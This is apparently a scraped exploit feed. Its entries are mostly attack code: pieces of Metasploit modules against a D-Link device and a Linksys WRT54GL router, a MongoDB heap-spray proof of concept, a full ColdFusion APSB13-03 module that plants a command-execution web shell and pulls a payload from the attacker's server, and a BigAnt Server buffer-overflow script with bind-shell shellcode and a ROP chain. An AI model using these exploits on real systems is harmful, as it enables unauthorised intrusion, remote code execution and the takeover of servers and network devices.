"#{rhost}:#{rport} - Unable to deploy payload") end # # execute # cmd = "/tmp/#{filename}" print_status("#{rhost}:#{rport} - Asking the Dlink device to execute #{downfile}") res = request(cmd,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end end # Handle incoming requests from the server def on_request_uri(cli, 
request) #print_status("on_request_uri called: #{request.inspect}") if (not @pl) print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") return end print_status("#{rhost}:#{rport} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end # wait for the data to be sent def wait_linux_payload print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...") waited = 0 while (not @elf_sent) select(nil, nil, nil, 1) waited += 1 if (waited > datastore['HTTP_DELAY']) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?") end end end

==> MongoDB nativeHelper.apply Remote Code Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss #Title: MongoDB nativeHelper.apply Remote Code Execution #Author: agixid http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/ #Software Link: http://fastdl.mongodb.org/linux/mongodb-linux-i686-2.2.3.tgz #Version: 2.2.3 The following PoC exploits the "nativeHelper" feature in the spidermonkey mongodb implementation. the NativeFunction "func" come from "x" javascript object and then is called without any check: db.my_collection.find({'$where':'shellcode=unescape("METASPLOIT JS GENERATED SHELLCODE"); sizechunk=0x1000; chunk=""; for(i=0;i<sizechunk;i++){ chunk+=unescape("%u9090%u9090"); } chunk=chunk.substring(0,(sizechunk-shellcode.length)); testarray=new Array(); for(i=0;i<25000;i++){ testarray[i]=chunk+shellcode; } ropchain=unescape("%uf768%u0816%u0c0c%u0c0c%u0000%u0c0c%u1000%u0000%u0007%u0000%u0031%u0000%uffff%uffff%u0000%u0000"); sizechunk2=0x1000; chunk2=""; for(i=0;i<sizechunk2;i++){ chunk2+=unescape("%u5a70%u0805"); } chunk2=chunk2.substring(0,(sizechunk2-ropchain.length)); testarray2=new Array(); for(i=0;i<25000;i++){ testarray2[i]=chunk2+ropchain; } nativeHelper.apply({"x" : 0x836e204}, ["A"+"\x26\x18\x35\x08"+"MongoSploit!"+"\x58\x71\x45\x08"+"sthack is a nice place to

==> Adobe ColdFusion APSB13-03 Remote Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'digest/sha1' require 'openssl' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe ColdFusion APSB13-03', 'Description' => %q{ This module exploits a pile of vulnerabilities in Adobe ColdFusion APSB13-03: * CVE-2013-0625: arbitrary command execution in scheduleedit.cfm (9.x only) * CVE-2013-0629: directory traversal * CVE-2013-0632: authentication bypass }, 'Author' => [ 'Jon Hart <jon_hart[at]rapid7.com', # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-0625'], [ 'CVE', '2013-0629'], # we don't actually exploit this, as this is the backdoor # dropped by malware exploiting the other vulnerabilities [ 'CVE', '2013-0631'], [ 'CVE', '2013-0632'], ], 'Targets' => [ ['Automatic Targeting', { 'auto' => true }], [ 'Universal CMD', { 'Arch' => ARCH_CMD, 'Platform' => ['unix', 'win', 'linux'] } ] ], 'DefaultTarget' => 1, 'Privileged' => true, 'Platform' => [ 'win', 'linux' ], 'DisclosureDate' => 'Jan 15 2013')) register_options( [ Opt::RPORT(80), OptString.new('USERNAME', [ false, 'The username to authenticate as' ]), OptString.new('PASSWORD', [ false, 'The password for the specified username' ]), OptBool.new('USERDS', [ true, 'Authenticate with RDS credentials', true ]), OptString.new('CMD', [ false, 'Command to run rather than dropping a payload', '' ]), ], self.class) register_advanced_options( [ OptBool.new('DELETE_TASK', [ true, 'Delete scheduled task when done', true ]), ], self.class) end def check exploitable = 0 exploitable += 1 if check_cve_2013_0629 exploitable += 1 if 
check_cve_2013_0632 exploitable > 0 ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe end # Login any way possible, returning the cookies if successful, empty otherwise def login cf_cookies = {} ways = { 'RDS bypass' => Proc.new { |foo| adminapi_login(datastore['USERNAME'], datastore['PASSWORD'], true) }, 'RDS login' => Proc.new { |foo| adminapi_login(datastore['USERNAME'], datastore['PASSWORD'], false) }, 'Administrator login' => Proc.new { |foo| administrator_login(datastore['USERNAME'], datastore['PASSWORD']) }, } ways.each do |what, how| these_cookies = how.call if got_auth? these_cookies print_status "Authenticated using '#{what}' technique" cf_cookies = these_cookies break end end fail_with(Exploit::Failure::NoAccess, "Unable to authenticate") if cf_cookies.empty? cf_cookies end def exploit # login cf_cookies = login # if we managed to login, get the listener ready datastore['URIPATH'] = rand_text_alphanumeric(6) srv_uri = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}" start_service # drop a payload on disk which we can used to execute # arbitrary commands, which will be needed regardless of # which technique (cmd, payload) the user wants input_exec = srv_uri + "/#{datastore['URIPATH']}-e" output_exec = "#{datastore['URIPATH']}-e.cfm" schedule_drop cf_cookies, input_exec, output_exec if datastore['CMD'] and not datastore['CMD'].empty? # now that the coldfusion exec is on disk, execute it, # passing in the command and arguments parts = datastore['CMD'].split(/\s+/) res = execute output_exec, parts.shift, parts.join(' ') print_line res.body.strip else # drop the payload input_payload = srv_uri + "/#{datastore['URIPATH']}-p" output_payload = "#{datastore['URIPATH']}-p" schedule_drop cf_cookies, input_payload, output_payload # make the payload executable # XXX: windows? 
execute output_exec, 'chmod', "755 ../../wwwroot/CFIDE/#{output_payload}" # execute the payload execute output_exec, "../../wwwroot/CFIDE/#{output_payload}" end handler end def execute cfm, cmd, args='' uri = "/CFIDE/" + cfm + "?cmd=#{cmd}&args=#{Rex::Text::uri_encode args}" send_request_raw( { 'uri' => uri, 'method' => 'GET' }, 25 ) end def on_new_session(client) return # TODO: cleanup if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") @files.each do |file| client.fs.file.rm("#{file}") end else @files.each do |file| client.shell_command_token("rm #{file}") end end end def on_request_uri cli, request cf_payload = "test" case request.uri when "/#{datastore['URIPATH']}-e" cf_payload = <<-EOF <cfparam name="url.cmd" type="string" default="id"/> <cfparam name="url.args" type="string" default=""/> <cfexecute name=#url.cmd# arguments=#url.args# timeout="5" variable="output" /> <cfoutput>#output#</cfoutput> EOF when "/#{datastore['URIPATH']}-p" cf_payload = payload.encoded end send_response(cli, cf_payload, { 'Content-Type' => 'text/html' }) end # Given a hash of cookie key value pairs, return a string # suitable for use as an HTTP Cookie header def build_cookie_header cookies cookies.to_a.map { |a| a.join '=' }.join '; ' end # this doesn't actually work def twiddle_csrf cookies, enable=false mode = (enable ? 
"Enabling" : "Disabling") print_status "#{mode} CSRF protection" params = { 'SessEnable' => enable.to_s, } res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, "/CFIDE/administrator/settings/memoryvariables.cfm"), 'method' => 'POST', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookies), 'vars_post' => params, }) if res if res.body =~ /SessionManagement should/ print_error "Error #{mode} CSRF" end else print_error "No response while #{mode} CSRF" end end # Using the provided +cookies+, schedule a ColdFusion task # to request content from +input_uri+ and drop it in +output_path+ def schedule_drop cookies, input_uri, output_path vprint_status "Attempting to schedule ColdFusion task" cookie_hash = cookies scheduletasks_path = "/CFIDE/administrator/scheduler/scheduletasks.cfm" scheduleedit_path = "/CFIDE/administrator/scheduler/scheduleedit.cfm" # make a request to the scheduletasks page to pick up the CSRF token res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, scheduletasks_path), 'method' => 'GET', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookie_hash), }) cookie_hash.merge! get_useful_cookies res if res # XXX: I can only seem to get this to work if 'Enable Session Variables' # is disabled (Server Settings -> Memory Variables) token = res.body.scan(/<input type="hidden" name="csrftoken" value="([^\"]+)"/).flatten.first unless token print_warning "Empty CSRF token found -- either CSRF is disabled (good) or we couldn't get one (bad)" #twiddle_csrf cookies, false token = '' end else fail_with(Exploit::Failure::Unknown, "No response when trying to GET scheduletasks.cfm for task listing") end # make a request to the scheduletasks page again, this time passing in our CSRF token # in an attempt to get all of the other cookies used in a request cookie_hash.merge! 
get_useful_cookies res res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?csrftoken=#{token}&submit=Schedule+New+Task", 'method' => 'GET', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookie_hash), }) fail_with(Exploit::Failure::Unknown, "No response when trying to GET scheduletasks.cfm for new task") unless res # pick a unique task ID task_id = SecureRandom.uuid # drop the backdoor in the CFIDE directory so it can be executed publish_file = '../../wwwroot/CFIDE/' + output_path # pick a start date. This must be in the future, so pick # one sufficiently far ahead to account for time zones, # improper time keeping, solar flares, drift, etc. start_date = "03/15/#{Time.now.strftime('%Y').to_i + 1}" params = { 'csrftoken' => token, 'TaskName' => task_id, 'Group' => 'default', 'Start_Date' => start_date, 'End_Date' => '', 'ScheduleType' => 'Once', 'StartTimeOnce' => '1:37 PM', 'Interval' => 'Daily', 'StartTimeDWM' => '', 'customInterval_hour' => '0', 'customInterval_min' => '0', 'customInterval_sec' => '0', 'CustomStartTime' => '', 'CustomEndTime' => '', 'repeatradio' => 'norepeatforeverradio', 'Repeat' => '', 'crontime' => '', 'Operation' => 'HTTPRequest', 'ScheduledURL' => input_uri, 'Username' => '', 'Password' => '', 'Request_Time_out' => '', 'proxy_server' => '', 'http_proxy_port' => '', 'publish' => '1', 'publish_file' => publish_file, 'publish_overwrite' => 'on', 'eventhandler' => '', 'exclude' => '', 'onmisfire' => '', 'onexception' => '', 'oncomplete' => '', 'priority' => '5', 'retrycount' => '3', 'advancedmode' => 'true', 'adminsubmit' => 'Submit', 'taskNameOriginal' => task_id, 'groupOriginal' => 'default', 'modeOriginal' => 'server', } cookie_hash.merge! 
(get_useful_cookies res) res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, scheduleedit_path), 'method' => 'POST', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookie_hash), 'vars_post' => params, }) if res # if there was something wrong with the task, capture those errors # print them and abort errors = res.body.scan(/<li class="errorText">(.*)<\/li>/i).flatten if errors.empty? if res.body =~ /SessionManagement should/ fail_with(Exploit::Failure::NoAccess, "Unable to bypass CSRF") end print_status "Created task #{task_id}" else fail_with(Exploit::Failure::NoAccess, "Unable to create task #{task_id}: #{errors.join(',')}") end else fail_with(Exploit::Failure::Unknown, "No response when creating task #{task_id}") end print_status "Executing task #{task_id}" res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?runtask=#{task_id}&csrftoken=#{token}&group=default&mode=server", 'method' => 'GET', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookie_hash), }) #twiddle_csrf cookies, true if datastore['DELETE_TASK'] print_status "Removing task #{task_id}" res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?action=delete&task=#{task_id}&csrftoken=#{token}", 'method' => 'GET', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookie_hash), }) end vprint_status normalize_uri(target_uri, publish_file) publish_file end # Given the HTTP response +res+, extract any interesting, non-empty # cookies, returning them as a hash def get_useful_cookies res set_cookie = res.headers['Set-Cookie'] # Parse the Set-Cookie header parsed_cookies = CGI::Cookie.parse(set_cookie) # Clean up the cookies we got by: # * Dropping Path and Expires from the parsed cookies -- we don't care # * Dropping empty (reset) cookies %w(Path Expires).each do |ignore| parsed_cookies.delete ignore parsed_cookies.delete ignore.downcase end parsed_cookies.keys.each do |name| 
parsed_cookies[name].reject! { |value| value == '""' } end parsed_cookies.reject! { |name,values| values.empty? } # the cookies always seem to start with CFAUTHORIZATION_, but # give the module the ability to log what it got in the event # that this stops becoming an OK assumption unless parsed_cookies.empty? vprint_status "Got the following cookies after authenticating: #{parsed_cookies}" end cookie_pattern = /^CF/ useful_cookies = parsed_cookies.select { |name,value| name =~ cookie_pattern } if useful_cookies.empty? vprint_status "No #{cookie_pattern} cookies found" else vprint_status "The following cookies could be used for future authentication: #{useful_cookies}" end useful_cookies end # Authenticates to ColdFusion Administrator via the adminapi using the # specified +user+ and +password+. If +use_rds+ is true, it is assumed that # the provided credentials are for RDS, otherwise they are assumed to be # credentials for ColdFusion Administrator. # # Returns a hash (cookie name => value) of the cookies obtained def adminapi_login user, password, use_rds vprint_status "Attempting ColdFusion Administrator adminapi login" user ||= '' password ||= '' res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, %w(CFIDE adminapi administrator.cfc)), 'method' => 'POST', 'connection' => 'TE, close', 'vars_post' => { 'method' => 'login', 'adminUserId' => user, 'adminPassword' => password, 'rdsPasswordAllowed' => (use_rds ? '1' : '0') } }) if res if res.code == 200 vprint_status "HTTP #{res.code} when authenticating" return get_useful_cookies(res) else print_error "HTTP #{res.code} when authenticating" end else print_error "No response when authenticating" end {} end # Authenticates to ColdFusion Administrator using the specified +user+ and # +password+ # # Returns a hash (cookie name => value) of the cookies obtained def administrator_login user, password cf_cookies = administrator_9x_login user, password unless got_auth? 
cf_cookies cf_cookies = administrator_10x_login user, password end cf_cookies end def administrator_10x_login user, password # coldfusion 10 appears to do: # cfadminPassword.value = hex_sha1(cfadminPassword.value) vprint_status "Trying ColdFusion 10.x Administrator login" res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, %w(CFIDE administrator enter.cfm)), 'method' => 'POST', 'vars_post' => { 'cfadminUserId' => user, 'cfadminPassword' => Digest::SHA1.hexdigest(password).upcase, 'requestedURL' => '/CFIDE/administrator/index.cfm', 'submit' => 'Login', } }) if res if res.code.to_s =~ /^30[12]/ useful_cookies = get_useful_cookies res if got_auth? useful_cookies return useful_cookies end else if res.body =~ /<title>Error/i print_status "Appears to be restricted and/or not ColdFusion 10.x" elsif res.body =~ /A License exception has occurred/i print_status "Is license restricted" else vprint_status "Got unexpected HTTP #{res.code} response when sending a ColdFusion 10.x request. Not 10.x?" vprint_status res.body end end end return {} end def got_auth? cookies not cookies.select { |name,values| name =~ /^CFAUTHORIZATION_/ }.empty? 
end def administrator_9x_login user, password vprint_status "Trying ColdFusion 9.x Administrator login" # coldfusion 9 appears to do: # cfadminPassword.value = hex_hmac_sha1(salt.value, hex_sha1(cfadminPassword.value)); # # You can get a current salt from # http://<host>:8500/CFIDE/adminapi/administrator.cfc?method=getSalt&name=CFIDE.adminapi.administrator&path=/CFIDE/adminapi/administrator.cfc#method_getSalt # # Unfortunately that URL might be restricted and the salt really just looks # to be the current time represented as the number of milliseconds since # the epoch, so just use that salt = (Time.now.to_i * 1000).to_s pass = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('sha1'), salt, Digest::SHA1.hexdigest(password).upcase).upcase res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, %w(CFIDE administrator enter.cfm)), 'method' => 'POST', 'vars_post' => { 'submit' => 'Login', 'salt' => salt, 'cfadminUserId' => user, 'requestedURL' => '/CFIDE/administrator/index.cfm', 'cfadminPassword' => pass, } }) if res return get_useful_cookies res else print_error "No response while trying ColdFusion 9.x authentication" end {} end # Authenticates to ColdFusion ComponentUtils using the specified +user+ and +password+ # # Returns a hash (cookie name => value) of the cookies obtained def componentutils_login user, password vprint_status "Attempting ColdFusion ComponentUtils login" vars = { 'j_password_required' => "Password+Required", 'submit' => 'Login', } vars['rdsUserId'] = user if user vars['j_password'] = password if password res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, %w(CFIDE componentutils cfcexplorer.cfc)), 'method' => 'POST', 'connection' => 'TE, close', 'vars_post' => vars }) cf_cookies = {} if res.code.to_s =~ /^(?:200|30[12])$/ cf_cookies = get_useful_cookies res else print_error "HTTP #{res.code} while attempting ColdFusion ComponentUtils login" end cf_cookies end def check_cve_2013_0629 vulns = 0 paths = %w(../../../license.txt 
../../../../license.html) # first try password-less bypass in the event that this thing # was just wide open vuln_without_creds = false paths.each do |path| if (traverse_read path, nil) =~ /ADOBE SYSTEMS INCORPORATED/ vulns += 1 vuln_without_creds = true break end end if vuln_without_creds print_status "#{datastore['RHOST']} is vulnerable to CVE-2013-0629 without credentials" else print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0629 without credentials" end # if credentials are provided, try those too if datastore['USERNAME'] and datastore['PASSWORD'] vuln_without_bypass = false paths.each do |path| cf_cookies = componentutils_login datastore['USERNAME'], datastore['PASSWORD'] if (traverse_read path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/ vulns += 1 vuln_without_bypass = true break end end if vuln_without_bypass print_status "#{datastore['RHOST']} is vulnerable to CVE-2013-0629 with credentials" else print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0629 with credentials" end end # now try with the CVE-2013-0632 bypass, in the event that this wasn't *totally* wide open vuln_with_bypass = false paths.each do |path| cf_cookies = adminapi_login datastore['USERNAME'], datastore['PASSWORD'], true # we need to take the cookie value from CFAUTHORIZATION_cfadmin # and use it for CFAUTHORIZATION_componentutils cf_cookies['CFAUTHORIZATION_componentutils'] = cf_cookies['CFAUTHORIZATION_cfadmin'] cf_cookies.delete 'CFAUTHORIZATION_cfadmin' if (traverse_read path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/ vulns += 1 vuln_with_bypass = true break end end if vuln_with_bypass print_status "#{datastore['RHOST']} is vulnerable to CVE-2013-0629 in combination with CVE-2013-0632" else print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0629 in combination with CVE-2013-0632" end vulns > 0 end # Checks for CVE-2013-0632, returning true if the target is # vulnerable, false otherwise def check_cve_2013_0632 if datastore['USERDS'] # 
the vulnerability for CVE-2013-0632 is that if RDS is disabled during install but # subsequently *enabled* after install, the password is unset so we simply must # check that and only that. cf_cookies = adminapi_login 'foo', 'bar', true if cf_cookies.empty? print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0632" else print_status "#{datastore['RHOST']} is vulnerable to CVE-2013-0632" return true end else print_error "Cannot test #{datastore['RHOST']} CVE-2013-0632 with USERDS off" end false end def traverse_read path, cookies uri = normalize_uri(target_uri.path) uri << "CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path=" uri << path res = send_request_cgi( { 'uri' => uri, 'method' => 'GET', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookies) }) res.body.gsub(/\r\n?/, "\n").gsub(/.<html>.<head>.<title>Component.*/m, '') end

==> BigAnt Server 2.97 - DDNF Username Buffer Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss #!/usr/bin/python #Title: BigAnt Server 2.97 DDNF Username Buffer Overflow #Author: Craig Freyman (@cd1zz) http://pwnag3.com #Tested on: Windows 7 64 bit (DEP/ASLR Bypass) #Similar Exploits: #http://www.exploit-db.com/exploits/24528/ #http://www.exploit-db.com/exploits/24527/ #http://www.exploit-db.com/exploits/22466/ import socket,os,struct,sys,subprocess,time if len(sys.argv) < 2: print "[-]Usage: %s <target addr> " % sys.argv[0] + "\r" sys.exit(0) host = sys.argv[1] #msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -b "\x00\x0a\x0d\x20\x25\x27" sc = ( "\xd9\xec\xba\x1f\xaf\x04\x2d\xd9\x74\x24\xf4\x5d\x2b\xc9" "\xb1\x56\x31\x55\x18\x03\x55\x18\x83\xc5\x1b\x4d\xf1\xd1" "\xcb\x18\xfa\x29\x0b\x7b\x72\xcc\x3a\xa9\xe0\x84\x6e\x7d" "\x62\xc8\x82\xf6\x26\xf9\x11\x7a\xef\x0e\x92\x31\xc9\x21" "\x23\xf4\xd5\xee\xe7\x96\xa9\xec\x3b\x79\x93\x3e\x4e\x78" "\xd4\x23\xa0\x28\x8d\x28\x12\xdd\xba\x6d\xae\xdc\x6c\xfa" "\x8e\xa6\x09\x3d\x7a\x1d\x13\x6e\xd2\x2a\x5b\x96\x59\x74" "\x7c\xa7\x8e\x66\x40\xee\xbb\x5d\x32\xf1\x6d\xac\xbb\xc3" "\x51\x63\x82\xeb\x5c\x7d\xc2\xcc\xbe\x08\x38\x2f\x43\x0b" "\xfb\x4d\x9f\x9e\x1e\xf5\x54\x38\xfb\x07\xb9\xdf\x88\x04" "\x76\xab\xd7\x08\x89\x78\x6c\x34\x02\x7f\xa3\xbc\x50\xa4" "\x67\xe4\x03\xc5\x3e\x40\xe2\xfa\x21\x2c\x5b\x5f\x29\xdf" "\x88\xd9\x70\x88\x7d\xd4\x8a\x48\xe9\x6f\xf8\x7a\xb6\xdb" "\x96\x36\x3f\xc2\x61\x38\x6a\xb2\xfe\xc7\x94\xc3\xd7\x03" "\xc0\x93\x4f\xa5\x68\x78\x90\x4a\xbd\x2f\xc0\xe4\x6d\x90" "\xb0\x44\xdd\x78\xdb\x4a\x02\x98\xe4\x80\x35\x9e\x2a\xf0" "\x16\x49\x4f\x06\x89\xd5\xc6\xe0\xc3\xf5\x8e\xbb\x7b\x34" "\xf5\x73\x1c\x47\xdf\x2f\xb5\xdf\x57\x26\x01\xdf\x67\x6c" "\x22\x4c\xcf\xe7\xb0\x9e\xd4\x16\xc7\x8a\x7c\x50\xf0\x5d" "\xf6\x0c\xb3\xfc\x07\x05\x23\x9c\x9a\xc2\xb3\xeb\x86\x5c" "\xe4\xbc\x79\x95\x60\x51\x23\x0f\x96\xa8\xb5\x68\x12\x77" "\x06\x76\x9b\xfa\x32\x5c\x8b\xc2\xbb\xd8\xff\x9a\xed\xb6" "\xa9\x5c\x44\x79\x03\x37\x3b\xd3\xc3\xce\x77\xe4\x95\xce" 
"\x5d\x92\x79\x7e\x08\xe3\x86\x4f\xdc\xe3\xff\xad\x7c\x0b" "\x2a\x76\x8c\x46\x76\xdf\x05\x0f\xe3\x5d\x48\xb0\xde\xa2" "\x75\x33\xea\x5a\x82\x2b\x9f\x5f\xce\xeb\x4c\x12\x5f\x9e" "\x72\x81\x60\x8b") #rop chain generated with mona.py - www.corelan.be rop_gadgets = "" rop_gadgets += struct.pack('<L',0x0f9edaa9) # POP EDX # RETN [expsrv.dll] rop_gadgets += struct.pack('<L',0x0fa021cc) # ptr to &VirtualProtect() IAT rop_gadgets += struct.pack('<L',0x0f9ea2a7) # MOV ECX,DWORD PTR DS:[EDX] # SUB EAX,ECX # RETN [expsrv.dll] rop_gadgets += struct.pack('<L',0x0f9e0214) # PUSH ECX # SUB AL,5F # POP ESI # POP EBP # RETN 0x24 [expsrv.dll] rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x0f9ee3d9) # POP ECX # RETN [expsrv.dll] rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x0F9A5001) # &Writable location rop_gadgets += struct.pack('<L',0x0f9f1e7c) # POP EDX # RETN [expsrv.dll] rop_gadgets += struct.pack('<L',0xffffffff) # EDX starting value for i in range(0,65): rop_gadgets += struct.pack('<L',0x0f9dbb5a) # INC EDX # RETN ghetto style [expsrv.dll] rop_gadgets += struct.pack('<L',0x0f9e65b6) # POP EAX # RETN [expsrv.dll] rop_gadgets += struct.pack('<L',0xfffffdff) # Value to negate, will become 0x00000201 rop_gadgets += struct.pack('<L',0x0f9f2831) # NEG EAX # RETN [expsrv.dll] rop_gadgets += struct.pack('<L',0x0f9c5f4b) # POP EDI # RETN [expsrv.dll] rop_gadgets 
+= struct.pack('<L',0x0FA0C001) # put this in edi so the nex one doesnt die, writable for edi rop_gadgets += struct.pack('<L',0x0f9e2be0) # PUSH EAX # OR BYTE PTR DS:[EDI+5E],BL # POP EBX # POP EBP # RETN 0x08 ** [expsrv.dll] rop_gadgets += struct.pack('<L',0x0f9e24f9) # push esp # ret 0x08 | {PAGE_EXECUTE_READ} [expsrv.dll rop_gadgets += struct.pack('<L',0x0f9c5f4b) # POP EDI # RETN [expsrv.dll] rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x0f9e5cd2) # RETN (ROP NOP) [expsrv.dll] rop_gadgets += struct.pack('<L',0x0f9c8a3e) # POP EAX # RETN [expsrv.dll] rop_gadgets += struct.pack('<L',0x909006eb) # nop with a ninja jump rop_gadgets += struct.pack('<L',0x0f9f30c2) # PUSHAD # RETN [expsrv.dll] rop_gadgets += struct.pack('<L',0x0f9e5cd2) # RETN (ROP NOP) [expsrv.dll] front = "A" * 684 seh = struct.pack('<L',0x0f9eeb8a) # ADD ESP,1004 [expsrv.dll] back = "C" * 1592 stack_adjust = "\x81\xc4\x24\xfa\xff\xff" junk = "D" * (4000 - (len(front) + len(seh) + len(back) + len(rop_gadgets) + len(stack_adjust) + len(sc))) sploit = front + seh + back + rop_gadgets + stack_adjust + sc + junk print "[+] Sending pwnag3 to " + str(host) try : s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,6661)) s.send("" "DDNF 17\n" "classid: 100\n" "cmdid: 1\n" "objid: 1\n" "rootid: 3\n" "userid: 8\n" "username: "+sploit+ "\r\n\r\n") time.sleep(1) except: print "[-] There was a problem" sys.exit() print "[+] Getting your shell. " time.sleep(3) subprocess.Popen("telnet "+host+" 4444",shell=True).wait() print"[*] Done." s.close()

==> Linksys WRT54GL apply.cgi Command Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Linksys WRT54GL apply.cgi Command Execution', 'Description' => %q{ Some Linksys Routers are vulnerable to an authenticated OS command injection in the Web Interface. Default credentials are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. The user must be prudent when using this module since it modifies the router configuration while exploitation, even when it tries to restore previous values. 
}, 'Author' => [ 'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module 'juan vazquez' # minor help with msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '89912' ], [ 'BID', '57459' ], [ 'EDB', '24202' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-001' ] ], 'DisclosureDate' => 'Jan 18 2013', 'Privileged' => true, 'Platform' => ['linux','unix'], 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ], [ 'Linux mipsel Payload', { 'Arch' => ARCH_MIPSLE, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 1, )) register_options( [ OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]), OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]), OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]), OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]), OptBool.new('RESTORE_CONF', [ true, 'Should we try to restore the original configuration', true ]) ], self.class) end def get_config(config, pattern) if config =~ /#{pattern}/ return $1 end return "" end def grab_config(user,pass) print_status("#{rhost}:#{rport} - Trying to download the original configuration") begin res = send_request_cgi({ 'uri' => '/index.asp', 'method' => 'GET', 'authorization' => basic_auth(user,pass) }) if res.nil? 
or res.code == 404 fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end if [200, 301, 302].include?(res.code) if res.body =~ /lan_ipaddr_0/ print_good("#{rhost}:#{rport} - Successful downloaded the configuration") else fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - Download of the original configuration not possible") end else fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server") end #now_proto and wan_proto should be the same and it should be dhcp! Nothing else tested! @now_proto_orig = get_config(res.body, "<input\ type=hidden\ name=now_proto\ value=\'(.*)\'>") if @now_proto_orig !~ /dhcp/ fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Configuration not recognized, aborting to avoid breaking the device") end @wan_proto_orig = get_config(res.body, "var\ wan_proto\ =\ \'(.*)\'\;") if @wan_proto_orig !~ /dhcp/ fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Configuration not recognized, aborting to avoid breaking the device") end @lan_proto_orig = get_config(res.body, "<input\ type=\"radio\"\ name=\"lan_proto\"\ value=\"(.*)\"\ checked\ onClick=\"SelDHCP") @daylight_time_orig = get_config(res.body, "<input\ type=hidden\ name=daylight_time\ value=(.*)>") 